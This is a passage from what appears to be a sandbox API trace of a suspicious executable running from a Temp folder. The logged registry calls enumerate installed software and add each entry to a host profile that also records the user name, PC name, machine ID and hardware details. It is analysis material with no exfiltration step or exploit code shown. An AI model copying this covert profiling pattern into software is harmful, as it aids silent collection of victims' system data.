PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001" [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\n" [0175.943] RegCloseKey (hKey=0x354) returned 0x0 [0175.943] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x33, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-012B-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.943] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-012B-0409-0000-0000000FF1CE}") returned 90 [0175.943] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-012B-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.943] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Skype for Business MUI (English) 2016", lpcbData=0x197fd4*=0x30) returned 0x0 [0175.943] lstrlenA (lpString="Microsoft Skype for Business MUI (English) 2016") returned 47 [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Skype for Business MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016" [0175.943] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional 